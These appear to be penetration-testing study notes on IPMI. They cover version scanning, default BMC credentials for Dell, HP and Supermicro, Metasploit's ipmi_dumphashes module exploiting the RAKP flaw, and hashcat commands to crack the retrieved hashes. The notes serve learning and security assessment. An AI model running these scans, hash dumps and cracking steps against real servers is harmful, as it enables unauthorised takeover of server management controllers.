- intelligent platform mgmt interface (IPMI) is a set of standardized specs for HW-based host mgmt systems used for system mgmt and monitoring - acts an autonomous subsystem that works independently of the host's BIOS, CPU, FW, and underlying OS - provides sysadmin with ability to manage and monitor systems even when powered off - operates using a separate direct network connection to system's HW and does not require access to the OS via a login shell - typically used in three ways: - before OS has mooted to modify BIOS settings - when host is fully powered down - access to host after a system failure - IPMI requires the following components: - baseboard mgmt controller (BMC) - intelligent chassis mgmt bus (ICMB) - IPMI memory - comms interface: typically LAN or serial ## Footprinting IPMI ```bash sudo nmap -sU --script ipmi-version -p623 <ip_addr> #also try ipmi_version scanner within metasploit msfconsole msf6> search scanner ipmi msf6> use auxiliary/scanner/ipmi/ipmi_version msf6> show options msf6> set RHOSTS <ip_addr> msf6> show options msf6> run ``` ## Default Config | Product | Username | Password | | --------------- | ------------- | -------------------- | | Dell iDRAC | root | calvin | | HP iLO | Administrator | random 8-char string | | Supermicro IPMI | ADMIN | ADMIN | ```bash #try impi_dumphashes scanner within metaploit #this module obtains a passsword hash for ANY valid user account on BMC by exploiting flaw in the RAKP protocol used with IPMI 2.0 msfconsole msf6> search scanner ipmi_dumphashes msf6> use auxiliary/scanner/ipmi/ipmi_dumphashes msf6> show options msf6> set RHOSTS <ip_addr> msf6> show options msf6> run #crack exposed hash hashcat -m 7300 hashes.txt /usr/share/wordlists/rockyou.txt hashcat -m 7300 -w 3 -O "hash" /usr/share/wordlists/rockyou.txt #leverage when HP iLO uses a factory default password hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u ```